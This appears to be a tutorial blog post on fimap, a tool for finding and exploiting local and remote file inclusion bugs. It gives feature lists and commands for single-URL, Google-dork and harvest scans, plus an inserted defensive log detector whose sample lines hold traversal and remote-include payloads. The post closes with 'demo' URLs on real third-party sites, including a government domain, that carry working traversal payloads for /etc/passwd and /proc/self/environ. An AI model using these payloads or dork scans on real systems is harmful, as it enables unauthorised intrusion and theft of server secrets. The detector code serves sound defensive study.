Hi everyone, this is one more post on a web scanner, this time one that specialises in LFI (Local File Inclusion) and RFI (Remote File Inclusion). There are various tools available on BackTrack, but Fimap is one of the finest for detecting LFI and RFI on a target website and exploiting it.

About Fimap Tool

Fimap is a Python tool that can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. It is still under development but works very well.

Features and Functions

  • Automatically find the root of the file system
  • Detect default files outside of the web folder
  • Attempts to detect passwords inside the files
  • Supports basic authentication
  • Can use a null byte to bypass some controls
  • Writes a report of the scan to a file
  • Add your own payloads and patches to the config.py file
  • Has a Harvest mode which can collect URLs from a given domain for later pentesting
  • All commands are now sent base64 encoded, so you can use quotes as much as you want
  • php://input detection is now 100% reliable
  • You can now define a POST string for relative and absolute files in config.py
  • TTL implemented; you can define it with --ttl. Default is 30 seconds
  • Experimental HTTP proxy support; you can define an HTTP(S) proxy with --http-proxy localhost:8080
  • Googlescanner can now skip the first X pages; use --skip-pages X
  • Lots of bugfixes and additional regular expressions
  • Can handle directories in RFI mode, where a null byte is not possible, for includes like:
    <?php include($_GET["inc"] . "/content/index.html"); ?>
    <?php include($_GET["inc"] . "_lang/index.html"); ?>
  • You always define absolute path names in the configs, so there is no need for redundant relative paths like:
    ../etc/passwd
    ../../etc/passwd
    ../../../etc/passwd
  • Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages
  • Tests and exploits multiple bugs: include(), include_once(), require(), require_once()

Working With Fimap

Scan a single URL for FI errors (quote the URL so the shell does not treat & as a job separator):

# ./fimap.py -u 'http://www.example.com/test.php?file=bang&id=23'

Scan Google search results for FI errors:

# ./fimap.py -g -q 'inurl:index.php'

Harvest all links of a webpage:

# ./fimap.py -H -u http://example.com -d 3 -w /tmp/urllist

  • -m is for mass scanning
  • -l is for a list of URLs
  • -g searches Google (scan websites using Google dorks)
  • -q is the query (dork) to search for in Google, as in ./fimap.py -g -q 'inurl:index.php'
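From the defender's side, the same indicators fimap relies on (../ traversal towards /etc/passwd or /proc/self/environ, the php://input wrapper, a remote URL in an include parameter, and %00 null-byte truncation) are what to look for in web server logs. The following detector is an added example, not code from the original post or from fimap; the access-log lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from urllib.parse import urlparse, parse_qsl, unquote

# Constructed Apache-style access-log lines (not taken from the original post);
# the client and payload hosts are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /content1.php?page=5&directLinks=../../../../etc/passwd HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /index.php?load=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /test.php?file=php://input HTTP/1.1" 200 1020
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /test.php?file=http://203.0.113.9/payload.txt%00 HTTP/1.1" 200 1020
198.51.100.2 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096
"""

# Each indicator corresponds to one of the fimap techniques listed above.
INDICATORS = [
    ("traversal",   re.compile(r"(\.\./|\.\.\\){2,}")),          # ../../ path climbing
    ("sensitive",   re.compile(r"/etc/passwd|/proc/self/environ")),
    ("php_wrapper", re.compile(r"^(php|data|expect)://", re.I)),  # php://input and friends
    ("remote_url",  re.compile(r"^(https?|ftp)://", re.I)),       # RFI: include from another host
    ("null_byte",   re.compile(r"\x00")),                         # %00 truncation trick
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def scan_request(ip, target):
    """Return one finding per suspicious query parameter of a single request."""
    parsed = urlparse(target)
    findings = []
    for name, raw in parse_qsl(parsed.query, keep_blank_values=True):
        value = unquote(unquote(raw))  # extra decoding rounds catch double-encoded %252e%252e%252f
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        if hits:
            findings.append({"ip": ip, "path": parsed.path, "param": name, "indicators": hits})
    return findings

def scan_log(text):
    """Parse access-log lines and collect file-inclusion findings across all requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings.extend(scan_request(m.group("ip"), m.group("target")))
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} param={f['param']} -> {', '.join(f['indicators'])}")
```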


Requirements

Needs: Python >= 2.4

Demo Site:
Vuln Check 1: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Vuln Check 2: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

Example 2: http://www.aladde.org/index.php?load=../../../../../../../../../../../../../../proc/self/environ

Hope you like this tutorial; don't forget to leave your valuable comment. Thank you :)